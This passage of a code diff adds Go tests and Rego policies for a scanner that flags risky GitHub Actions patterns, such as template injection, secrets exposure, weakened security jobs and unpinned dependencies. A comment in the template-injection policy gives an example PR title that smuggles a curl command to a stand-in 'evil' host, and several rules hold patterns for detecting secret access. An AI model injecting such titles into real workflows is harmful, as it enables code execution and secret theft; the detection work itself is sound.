+			// config, not a workflow file.
+			if err := os.WriteFile(filepath.Join(tmp, ".github", "dependabot.yml"), data, 0o644); err != nil {
+				t.Fatal(err)
+			}
+			// Minimal workflow so the scanner has something to scan.
+			minimal := []byte("name: x\non: [push]\njobs:\n x:\n runs-on: ubuntu-latest\n steps:\n - run: echo x\n")
+			if err := os.WriteFile(filepath.Join(tmp, ".github", "workflows", "w.yml"), minimal, 0o644); err != nil {
+				t.Fatal(err)
+			}
+			pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+			if err != nil {
+				t.Fatalf("scan: %v", err)
+			}
+			findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+			if err != nil {
+				t.Fatalf("evaluate: %v", err)
+			}
+			hits := 0
+			for _, f := range findings {
+				if f.Code == "ISSUE-607" {
+					hits++
+				}
+			}
+			if hits != c.wantCount {
+				t.Fatalf("%s: expected %d, got %d", c.fixture, c.wantCount, hits)
+			}
+		})
+	}
+}
+
+// TestIssue306_GitHubAppSkipRevoke flags app-token minting with
+// skip-token-revoke: true.
+func TestIssue306_GitHubAppSkipRevoke(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-306", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_skip_revoke.yml", []string{"violation_skip_revoke/release"}},
+		{"clean_default.yml", nil},
+	})
+}
+
+// TestIssue415_PullRequestTargetWithHeadCheckout flags the tj-actions
+// pattern: pull_request_target + checkout of the PR head SHA/ref.
+func TestIssue415_PullRequestTargetWithHeadCheckout(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-415", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_head_sha.yml", []string{"violation_head_sha/preview"}},
+		{"clean_no_ref.yml", nil},
+	})
+}
+
+// TestIssue215_TemplateInjectionVars flags scripts that expand
+// `vars.*` or `inputs.*` directly into a shell command; env-binding
+// pattern stays silent.
+func TestIssue215_TemplateInjectionVars(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-215", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_vars_docker_login.yml", []string{"violation_vars_docker_login/login"}},
+		{"violation_inputs_reusable.yml", []string{"violation_inputs_reusable/run"}},
+		{"clean_env_binding.yml", nil},
+	})
+}
+
+// TestIssue308_SecretsDynamicIndex flags secrets[expr] with a
+// non-literal index; literal quoted forms (secrets.NAME,
+// secrets['NAME']) stay silent.
+func TestIssue308_SecretsDynamicIndex(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-308", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_secrets_env_index.yml", []string{"violation_secrets_env_index/e2e"}},
+		{"clean_literal_quoted.yml", nil},
+	})
+}
+
+// TestIssue113_RefConfusion drives a hand-built IR because the
+// API metadata feeding ref-confusion is not exercised by the unit-
+// test harness (PLUMBER_DISABLE_GITHUB_API is set in TestMain).
+// The test checks that the policy fires exactly when RefIsAmbiguous
+// is true on an Action.
+func TestIssue113_RefConfusion(t *testing.T) {
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+
+	// Two actions: only the one with RefIsAmbiguous set may fire;
+	// the unambiguous checkout pin must stay silent.
+	pipeline := &ir.NormalizedPipeline{
+		Provider: ir.ProviderGitHub,
+		Jobs: []ir.Job{
+			{
+				Name: "build",
+				Uses: []ir.Action{
+					{Uses: "owner/repo@v1", Metadata: &ir.ActionMetadata{RefKind: "tag", RefExists: true, RefIsAmbiguous: true}},
+					{Uses: "actions/checkout@v4", Metadata: &ir.ActionMetadata{RefKind: "tag", RefExists: true}},
+				},
+			},
+		},
+	}
+	findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+	if err != nil {
+		t.Fatalf("evaluate: %v", err)
+	}
+	hits := 0
+	for _, f := range findings {
+		if f.Code == "ISSUE-113" {
+			hits++
+		}
+	}
+	if hits != 1 {
+		t.Fatalf("expected 1 ISSUE-113 finding, got %d", hits)
+	}
+}
+
+// TestIssue114_KnownVulnerableAction same hand-built approach β
+// stub the Advisories slice directly on the IR.
+func TestIssue114_KnownVulnerableAction(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: []ir.Job{
+ {
+ Name: "build",
+ Uses: []ir.Action{
+ {Uses: "tj-actions/changed-files@v45", Metadata: &ir.ActionMetadata{RefKind: "tag", RefExists: true, Advisories: []string{"GHSA-mrrh-fwg8-r2c3"}}},
+ {Uses: "actions/checkout@v4", Metadata: &ir.ActionMetadata{RefKind: "tag", RefExists: true}},
+ },
+ },
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code != "ISSUE-114" {
+ continue
+ }
+ hits++
+ // The message must carry the advisory URL so the
+ // terminal renderer turns it into a clickable link.
+ wantLink := "https://github.com/advisories/GHSA-mrrh-fwg8-r2c3"
+ if !strings.Contains(f.Message, wantLink) {
+ t.Fatalf("ISSUE-114 message missing advisory URL\n got: %s\n want substring: %s", f.Message, wantLink)
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-114 finding, got %d", hits)
+ }
+}
+
+// TestIssue115_SuperfluousAction flags peter-evans/create-pull-request
+// and similar third-party wrappers.
+func TestIssue115_SuperfluousAction(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_peter_evans_pr.yml", []string{"violation_peter_evans_pr/open-pr"}},
+ {"clean.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-115", cases)
+}
+
+// TestIssue213_UnsafeGitHubContextDump flags jobs that serialise
+// the entire `github` context via toJson(github).
+func TestIssue213_UnsafeGitHubContextDump(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_tojson_github_event.yml", []string{"violation_tojson_github_event/report"}},
+ {"clean.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-213", cases)
+}
+
+// TestIssue214_UnpinnedPackageInstall flags `pip install pkg` /
+// `npm install pkg` without a pinned version or lockfile.
+func TestIssue214_UnpinnedPackageInstall(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_pip_unpinned.yml", []string{"violation_pip_unpinned/test"}},
+ {"clean.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-214", cases)
+}
+
+// TestIssue112_ReleaseWorkflowUnsigned flags release jobs that
+// publish artefacts without any signing step.
+func TestIssue112_ReleaseWorkflowUnsigned(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_release_unsigned.yml", []string{"violation_release_unsigned/publish"}},
+ {"clean_cosign.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-112", cases)
+}
+
+// TestIssue609_SASTWorkflowMissing flags repos with workflows but
+// no SAST action invocation.
+func TestIssue609_SASTWorkflowMissing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ t.Run("no-sast", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: []ir.Job{{
+ Name: "build",
+ OriginFile: "/tmp/.github/workflows/build.yml",
+ Uses: []ir.Action{{Uses: "actions/checkout@v4"}},
+ }},
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-609" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-609, got %d", hits)
+ }
+ })
+ t.Run("has-sast", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: []ir.Job{{
+ Name: "analyze",
+ OriginFile: "/tmp/.github/workflows/codeql.yml",
+ Uses: []ir.Action{{Uses: "github/codeql-action/analyze@v3"}},
+ }},
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ for _, f := range findings {
+ if f.Code == "ISSUE-609" {
+ t.Fatalf("unexpected ISSUE-609 on SAST-equipped repo: %+v", f)
+ }
+ }
+ })
+}
+
+// TestIssue608_DependencyUpdateToolMissing flags repos with
+// workflows but neither dependabot nor renovate config.
+func TestIssue608_DependencyUpdateToolMissing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ baseJobs := []ir.Job{{Name: "build", OriginFile: "/tmp/.github/workflows/build.yml"}}
+ t.Run("no-tool", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitHub, Jobs: baseJobs}
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-608" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-608, got %d", hits)
+ }
+ })
+ t.Run("has-dependabot", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: baseJobs,
+ Dependabot: &ir.DependabotConfig{Path: "/tmp/.github/dependabot.yml"},
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ for _, f := range findings {
+ if f.Code == "ISSUE-608" {
+ t.Fatalf("unexpected ISSUE-608 on dependabot-equipped repo: %+v", f)
+ }
+ }
+ })
+ t.Run("has-renovate", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: baseJobs,
+ RenovateConfigPath: "/tmp/renovate.json",
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ for _, f := range findings {
+ if f.Code == "ISSUE-608" {
+ t.Fatalf("unexpected ISSUE-608 on renovate-equipped repo: %+v", f)
+ }
+ }
+ })
+}
+
+// TestIssue610_SecurityPolicyMissing flags repos with workflows
+// but no SECURITY.md.
+func TestIssue610_SecurityPolicyMissing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ baseJobs := []ir.Job{{Name: "build", OriginFile: "/tmp/.github/workflows/build.yml"}}
+ t.Run("missing", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitHub, Jobs: baseJobs}
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-610" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-610, got %d", hits)
+ }
+ })
+ t.Run("present", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: baseJobs,
+ SecurityPolicyPath: "/tmp/SECURITY.md",
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ for _, f := range findings {
+ if f.Code == "ISSUE-610" {
+ t.Fatalf("unexpected ISSUE-610: %+v", f)
+ }
+ }
+ })
+}
+
+// TestIssue107_DockerfileUnpinnedBase flags FROM directives
+// without a @sha256 digest.
+func TestIssue107_DockerfileUnpinnedBase(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Dockerfiles: []ir.Dockerfile{
+ {
+ Path: "/tmp/Dockerfile",
+ Bases: []ir.DockerfileBase{
+ {Image: "alpine:3.20", Line: 1, PinnedByDigest: false},
+ {Image: "node:20@sha256:abc123", Line: 7, PinnedByDigest: true},
+ {Image: "scratch", Line: 12, PinnedByDigest: false},
+ {Image: "builder", Line: 15, PinnedByDigest: false},
+ },
+ },
+ },
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-107" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-107 (alpine:3.20 unpinned), got %d", hits)
+ }
+}
diff --git a/policies/sast_workflow_missing.rego b/policies/sast_workflow_missing.rego
new file mode 100644
index 0000000..9ce4f83
--- /dev/null
+++ b/policies/sast_workflow_missing.rego
@@ -0,0 +1,63 @@
+# sast-workflow-missing β flag repositories that ship workflows but
+# do not run any recognised static application security testing
+# scanner. SAST catches whole vulnerability classes (injection,
+# unsafe deserialisation, crypto misuse) before they reach
+# production; leaving it out of CI means the only gate is manual
+# review, which misses regressions on large diffs.
+#
+# Repository-level rule β emits once per repo when the condition
+# holds, identified by the first job's file. Projects that genuinely
+# cannot run SAST in CI can disable the rule via
+# `--skip-controls repositoriesMustRunSAST`.
+package sast_workflow_missing
+
+import rego.v1
+
+sast_action_prefixes := {
+ "github/codeql-action/init",
+ "github/codeql-action/analyze",
+ "returntocorp/semgrep-action",
+ "semgrep/semgrep-action",
+ "sonarsource/sonarqube-scan-action",
+ "sonarsource/sonarcloud-github-action",
+ "aquasecurity/trivy-action",
+ "snyk/actions",
+ "fossas/fossa-action",
+ "trufflesecurity/trufflehog",
+ "anchore/scan-action",
+ "bearer/bearer-action",
+ "checkmarx/ast-github-action",
+ "microsoft/DevSkim-Action",
+ "gitleaks/gitleaks-action",
+ "shiftleftsecurity/scan-action",
+ "zaproxy/action-baseline",
+}
+
+deny contains finding if {
+ input.pipeline.provider == "github"
+ count(input.pipeline.jobs) > 0
+ not _any_workflow_runs_sast
+ # Emit once, anchored on the first job's file so the renderer
+ # has something to show in the `β³ at` hint.
+ first_file := input.pipeline.jobs[0].originFile
+ finding := {
+ "code": "ISSUE-609",
+ "severity": "low",
+ "message": "repository ships workflows but none runs a recognised SAST scanner β add CodeQL / Semgrep / SonarQube / Trivy",
+ "file": first_file,
+ }
+}
+
+_any_workflow_runs_sast if {
+ some i, j
+ action := input.pipeline.jobs[i].uses[j]
+ some prefix in sast_action_prefixes
+ startswith(action.uses, sprintf("%s@", [prefix]))
+}
+
+_any_workflow_runs_sast if {
+ some i, j
+ action := input.pipeline.jobs[i].uses[j]
+ some prefix in sast_action_prefixes
+ action.uses == prefix
+}
diff --git a/policies/secrets_dynamic_index.rego b/policies/secrets_dynamic_index.rego
new file mode 100644
index 0000000..ba46601
--- /dev/null
+++ b/policies/secrets_dynamic_index.rego
@@ -0,0 +1,57 @@
+# secrets-dynamic-index β flag workflows that access a secret through
+# a non-literal index: `${{ secrets[expr] }}` with expr = env.X,
+# inputs.X, matrix.X, vars.X, or any expression. The bracket form
+# resolves the secret name at runtime, which defers authorisation
+# from the reviewer (who reads the YAML) to whatever drives expr.
+#
+# When expr is maintainer-controlled (an env binding in the same
+# workflow) the immediate risk is low; the real concern is the
+# pattern's fragility β a later refactor that introduces a template
+# expression at the indexed position, or a matrix parameter that
+# leaks into expr, promotes the weakness silently.
+#
+# Detection looks across scripts, env values and action `with:`
+# inputs for the pattern `secrets[...]` where the inside is anything
+# other than a pure quoted string literal.
+package secrets_dynamic_index
+
+import rego.v1
+
+# Match `secrets[...]` where the inner content is NOT a quoted
+# literal. The first character inside the brackets indicates what we
+# caught:
+# - A single / double quote β `secrets['NAME']` is the safe form,
+# skip.
+# - Anything else (env., inputs., matrix., vars., `format(β¦)`, β¦)
+# β flag.
+dynamic_index_pattern := `\$\{\{\s*secrets\s*\[\s*[^'"\s\]]`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _job_uses_dynamic_secret_index(job)
+ finding := {
+ "code": "ISSUE-308",
+ "severity": "low",
+ "message": sprintf("job %q reads a secret through a dynamic index `secrets[...]` β the grant surface is not explicit in the workflow source", [job.name]),
+ "job": job.name,
+ }
+}
+
+_job_uses_dynamic_secret_index(job) if {
+ some k
+ regex.match(dynamic_index_pattern, job.scripts[k])
+}
+
+_job_uses_dynamic_secret_index(job) if {
+ some _, value in job.variables
+ regex.match(dynamic_index_pattern, value)
+}
+
+_job_uses_dynamic_secret_index(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(dynamic_index_pattern, value)
+}
diff --git a/policies/secrets_inherit.rego b/policies/secrets_inherit.rego
new file mode 100644
index 0000000..574766a
--- /dev/null
+++ b/policies/secrets_inherit.rego
@@ -0,0 +1,31 @@
+# secrets-inherit β flag reusable-workflow calls that forward every
+# caller-visible secret to the callee via `secrets: inherit`.
+# The blast radius of a compromised reusable workflow then scales with
+# the caller's full secret surface (repository + organisation +
+# environment) rather than with the narrow set the callee actually
+# needs. Explicit per-secret mappings are the safer pattern:
+#
+# jobs:
+# call:
+# uses: owner/shared/.github/workflows/publish.yml@abc123β¦
+# secrets:
+# NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+#
+# The collector surfaces ReusableWorkflowUses and SecretsInherit on
+# the IR directly, so the rule reduces to checking those two fields.
+package secrets_inherit
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ job.reusableWorkflowUses != ""
+ job.secretsInherit == true
+ finding := {
+ "code": "ISSUE-302",
+ "severity": "high",
+ "message": sprintf("job %q calls reusable workflow %q with `secrets: inherit` β forward only the secrets the callee needs", [job.name, job.reusableWorkflowUses]),
+ "job": job.name,
+ }
+}
diff --git a/policies/secrets_outside_env.rego b/policies/secrets_outside_env.rego
new file mode 100644
index 0000000..13320d9
--- /dev/null
+++ b/policies/secrets_outside_env.rego
@@ -0,0 +1,89 @@
+# secrets-outside-env β flag deploy / publish / release jobs that
+# consume production secrets without an `environment:` gate. GitHub's
+# environment feature is the hook for required reviewers, wait
+# timers, and deployment branch rules β without one, any caller on
+# the trigger reaches the secret-bearing step with no human in the
+# loop.
+#
+# The heuristic: a job that either
+#
+# - runs on the `release` trigger, OR
+# - invokes a canonical publish action (PyPI, npm, Maven Central,
+# container-image push, k8s apply, β¦)
+#
+# AND references a secret (`secrets.*`) in its scripts / env / action
+# inputs AND has no `environment:` set. Normal CI jobs that happen to
+# read a secret (CODECOV_TOKEN, NPM_TOKEN for tests) stay silent β the
+# deploy-like context is a prerequisite.
+package secrets_outside_env
+
+import rego.v1
+
+publish_action_prefixes := {
+ "pypa/gh-action-pypi-publish",
+ "JS-DevTools/npm-publish",
+ "gradle/publish-plugin",
+ "softprops/action-gh-release",
+ "ncipollo/release-action",
+ "goreleaser/goreleaser-action",
+ "docker/build-push-action",
+ "azure/k8s-deploy",
+ "google-github-actions/deploy-cloudrun",
+ "google-github-actions/deploy-appengine",
+ "aws-actions/amazon-ecs-deploy-task-definition",
+}
+
+secret_ref_pattern := `\$\{\{\s*secrets\.[A-Za-z_]`
+
+deny contains finding if {
+	some i
+	job := input.pipeline.jobs[i]
+	_is_deploy_context(job)
+	_job_uses_secrets(job)
+	object.get(job, "environment", "") == ""
+	finding := {
+		"code": "ISSUE-305",
+		"severity": "medium",
+		"message": sprintf("deploy/publish job %q consumes secrets without an `environment:` gate — no reviewer, wait timer or branch rule stands between the trigger and the secret", [job.name]),
+		"job": job.name,
+	}
+}
+
+_is_deploy_context(job) if {
+ some t in job.triggers
+ t == "release"
+}
+
+_is_deploy_context(job) if {
+ some k
+ action := job.uses[k]
+ _is_publish_action(action.uses)
+}
+
+_is_publish_action(uses) if {
+ some prefix in publish_action_prefixes
+ startswith(uses, sprintf("%s@", [prefix]))
+}
+
+_is_publish_action(uses) if {
+ some prefix in publish_action_prefixes
+ uses == prefix
+}
+
+_job_uses_secrets(job) if {
+ some k
+ regex.match(secret_ref_pattern, job.scripts[k])
+}
+
+_job_uses_secrets(job) if {
+ some _, value in job.variables
+ regex.match(secret_ref_pattern, value)
+}
+
+_job_uses_secrets(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(secret_ref_pattern, value)
+}
diff --git a/policies/security_jobs_weakened.rego b/policies/security_jobs_weakened.rego
new file mode 100644
index 0000000..0cc506d
--- /dev/null
+++ b/policies/security_jobs_weakened.rego
@@ -0,0 +1,90 @@
+# security-jobs-weakened β flag pipeline jobs that match the security
+# job naming convention (SAST, Secret Detection, Dependency Scanning,
+# β¦) and are silently weakened via allow_failure: true or
+# when: manual. These settings let broken or skipped scans look like
+# a passing pipeline, defeating the guardrail they provide.
+#
+# Config:
+# input.config.securityJobsWeakened.securityJobPatterns = ["*-sast", β¦]
+# input.config.securityJobsWeakened.allowFailureMustBeFalse = true
+# input.config.securityJobsWeakened.whenMustNotBeManual = true
+package security_jobs_weakened
+
+import rego.v1
+
+# One finding per (job, reason). Reasons are collected as a set so a
+# job weakened in several ways at once reports each one, instead of
+# tripping OPA's "complete rules must not produce multiple outputs".
+deny contains finding if {
+	some i
+	job := input.pipeline.jobs[i]
+	_is_security_job(job.name)
+	some reason in _weakening_reasons(job)
+	finding := {
+		"code": "ISSUE-410",
+		"severity": "high",
+		"message": sprintf("security job %q is weakened: %s", [job.name, reason]),
+		"job": job.name,
+		"detail": reason,
+	}
+}
+
+_is_security_job(name) if {
+	pattern := input.config.securityJobsWeakened.securityJobPatterns[_]
+	glob.match(pattern, null, name)
+}
+
+# All weakening reasons that apply to `job`. Each candidate is an
+# independent set comprehension (empty when its guard fails), so any
+# combination of weakenings composes without an output conflict.
+_weakening_reasons(job) := reasons if {
+	allow_failure := {r |
+		input.config.securityJobsWeakened.allowFailureMustBeFalse == true
+		job.allowFailure == true
+		r := "allow_failure: true masks scan failures"
+	}
+	manual_when := {r |
+		input.config.securityJobsWeakened.whenMustNotBeManual == true
+		job.when == "manual"
+		r := "when: manual prevents the scan from running automatically"
+	}
+	rules_override := {r |
+		input.config.securityJobsWeakened.rulesMustNotBeRedefined == true
+		_rules_redefined_by_project(job)
+		some i
+		w := job.rules[i].when
+		_blocking_when(w)
+		r := sprintf("rules overridden with 'when: %s', job will not run", [w])
+	}
+	reasons := union({allow_failure, manual_when, rules_override})
+}
+
+# A job's rules are "redefined by the project" when either
+# - the job is locally authored (hardcoded / local / project file)
+# and ships with a rules: block, or
+# - the job is overridden from an upstream component/template and
+# the override list explicitly mentions `rules`.
+# Vanilla upstream rules β even with a `when: never` line for a
+# deprecated analyzer β must NOT count as a project-side weakening.
+_rules_redefined_by_project(job) if {
+ job.originKind == "hardcoded"
+}
+
+_rules_redefined_by_project(job) if {
+ job.originKind == "local"
+}
+
+_rules_redefined_by_project(job) if {
+ job.originKind == "project"
+}
+
+_rules_redefined_by_project(job) if {
+ job.overridden == true
+ some k
+ job.overriddenKeys[k] == "rules"
+}
+
+_blocking_when("never")
+
+_blocking_when("manual")
+
diff --git a/policies/security_policy_missing.rego b/policies/security_policy_missing.rego
new file mode 100644
index 0000000..7ffdc04
--- /dev/null
+++ b/policies/security_policy_missing.rego
@@ -0,0 +1,27 @@
+# security-policy-missing β flag repositories that have workflows
+# but no SECURITY.md disclosure policy. Without one, researchers
+# who find an issue have no public contact channel beyond opening
+# a GitHub issue, which defeats coordinated disclosure and trains
+# them to dump vulnerabilities in the open. The file can be short:
+# two lines naming the contact channel and the expected response
+# window are enough to move reports off the public tracker.
+#
+# The collector probes the three locations GitHub itself recognises
+# (repo root, `.github/`, `docs/`) and surfaces the path when it
+# finds one. Empty path β finding.
+package security_policy_missing
+
+import rego.v1
+
+deny contains finding if {
+	input.pipeline.provider == "github"
+	count(input.pipeline.jobs) > 0
+	object.get(input.pipeline, "securityPolicyPath", "") == ""
+	first_file := input.pipeline.jobs[0].originFile
+	finding := {
+		"code": "ISSUE-610",
+		"severity": "low",
+		"message": "repository has workflows but no SECURITY.md policy file — add one at the repo root or under .github/ to document the disclosure channel",
+		"file": first_file,
+	}
+}
diff --git a/policies/stale_action_ref.rego b/policies/stale_action_ref.rego
new file mode 100644
index 0000000..5cfc99c
--- /dev/null
+++ b/policies/stale_action_ref.rego
@@ -0,0 +1,51 @@
+# stale-action-ref β flag workflow steps pinned to a SHA that is
+# behind the action's latest upstream release. Stale pins miss
+# security fixes and dependency bumps shipped in later tags. Low
+# severity β not every project must track latest, but visibility on
+# the gap lets Dependabot (or the maintainer) plan refreshes.
+#
+# Runs only when the collector resolved both the pinned ref and the
+# latest release's SHA. Tag pins that happen to equal the latest
+# stay silent β they are already up-to-date.
+package stale_action_ref
+
+import rego.v1
+
+sha_pattern := `^[0-9a-f]{40}$`
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ action.metadata
+ action.metadata.latestReleaseSha != ""
+ ref := _ref_of(action.uses)
+ pinned := _pinned_sha(ref, action.metadata)
+ pinned != ""
+ pinned != action.metadata.latestReleaseSha
+ finding := {
+ "code": "ISSUE-111",
+ "severity": "low",
+ "message": sprintf("job %q pins %q behind the latest release %q β refresh to pick up upstream security fixes", [job.name, action.uses, action.metadata.latestTag]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+# _pinned_sha returns the SHA the current ref resolves to. For a tag
+# pin, metadata.tagSha carries the resolved value; for a SHA pin the
+# ref itself is the answer. The else-chain keeps the function
+# single-valued even if the collector ever emits inconsistent
+# metadata (a sha-form ref carrying refKind "tag" and a tagSha).
+_pinned_sha(ref, meta) := meta.tagSha if {
+	meta.refKind == "tag"
+	meta.tagSha != ""
+} else := ref if {
+	regex.match(sha_pattern, ref)
+}
+
+_ref_of(uses) := ref if {
+ idx := indexof(uses, "@")
+ idx >= 0
+ ref := substring(uses, idx + 1, -1)
+}
diff --git a/policies/superfluous_action.rego b/policies/superfluous_action.rego
new file mode 100644
index 0000000..1bb49b2
--- /dev/null
+++ b/policies/superfluous_action.rego
@@ -0,0 +1,58 @@
+# superfluous-action β flag third-party actions that duplicate
+# functionality already on the GitHub-hosted runner. Each such
+# reference is an extra supply-chain dependency for zero capability
+# gain β the sort of link an `impostor-commit`, a tag retag, or a
+# maintainer account compromise can turn into a foothold without
+# any functional reason to have accepted the risk.
+#
+# The curated list tracks the most common offenders: small wrappers
+# over `gh`, shell retry loops, and action installers for tools
+# `ubuntu-latest` already has on PATH (`yq`, `jq`, `python`). It is
+# intentionally conservative β complex actions (`actions/cache`,
+# `actions/upload-artifact`, `actions/setup-*`) do enough real work to
+# stay off this list.
+#
+# Users who disagree with a specific entry can drop the rule on the
+# workflow via `--skip-controls actionsMustNotDuplicateRunnerBuiltins`
+# rather than fight the list.
+package superfluous_action
+
+import rego.v1
+
+superfluous_prefixes := {
+ "peter-evans/create-pull-request": "gh pr create from the runner",
+ "nick-invision/retry": "bash `for i in 1 2 3; do ... && break; done`",
+ "nick-fields/retry": "bash `for i in 1 2 3; do ... && break; done`",
+ "actions-ecosystem/action-regex-match": "bash `[[ $X =~ $re ]]` / `grep -E`",
+ "mikefarah/yq-action": "`yq` is preinstalled on ubuntu-latest",
+ "dcarbone/install-jq-action": "`jq` is preinstalled on ubuntu-latest",
+ "nicholasdille/run-with-retry": "bash retry loop",
+ "andymckay/labeler": "gh api gh pr edit --add-label",
+ "actions-ecosystem/action-add-labels": "gh api gh pr edit --add-label",
+}
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ reason := _superfluous_reason(action.uses)
+ finding := {
+ "code": "ISSUE-115",
+ "severity": "low",
+ "message": sprintf("job %q uses %q β same effect as %q from the runner, drop the third-party dependency", [job.name, action.uses, reason]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+_superfluous_reason(uses) := reason if {
+ some prefix, r in superfluous_prefixes
+ startswith(uses, sprintf("%s@", [prefix]))
+ reason := r
+}
+
+_superfluous_reason(uses) := reason if {
+ some prefix, r in superfluous_prefixes
+ uses == prefix
+ reason := r
+}
diff --git a/policies/template_injection.rego b/policies/template_injection.rego
new file mode 100644
index 0000000..d40d7b8
--- /dev/null
+++ b/policies/template_injection.rego
@@ -0,0 +1,42 @@
+# template-injection β flag inline `run:` scripts that interpolate
+# user-controlled GitHub template expressions directly into the shell
+# command. The canonical attacker scenario: a pull request opens with
+# a crafted title like `"; curl https://evil; #` and the workflow
+# pastes it verbatim into a shell one-liner. Under a privileged
+# trigger (`pull_request_target`, `workflow_run`, β¦) the attacker ends
+# up executing arbitrary code with the repo's secrets.
+#
+# Severity is "critical" for the same reasons as dangerous-triggers
+# (ISSUE-414): this is the pattern behind the March 2025
+# tj-actions/changed-files supply-chain compromise
+# (CVE-2025-30066). The safe way to use such values is via an env:
+# binding, then dereferencing the environment variable ("$TITLE"),
+# which shell-escapes the value. This policy flags only direct
+# interpolation inside `run:`, so the env-binding pattern remains
+# quiet.
+package template_injection
+
+import rego.v1
+
+# Regex patterns matching template expressions whose value is under
+# the control of an unprivileged PR author. Additional patterns can
+# be added here as the check evolves; the shared message keeps the
+# output simple regardless of which pattern matched.
+unsafe_patterns := [
+	`\$\{\{\s*github\.event\.`,
+	`\$\{\{\s*github\.head_ref\s*\}\}`,
+]
+
+deny contains finding if {
+ some i, j, k
+ job := input.pipeline.jobs[i]
+ script := job.scripts[j]
+ pattern := unsafe_patterns[k]
+ regex.match(pattern, script)
+ finding := {
+ "code": "ISSUE-206",
+ "severity": "critical",
+ "message": sprintf("job %q interpolates a user-controlled template expression into an inline script (template-injection risk)", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/template_injection_vars.rego b/policies/template_injection_vars.rego
new file mode 100644
index 0000000..598171c
--- /dev/null
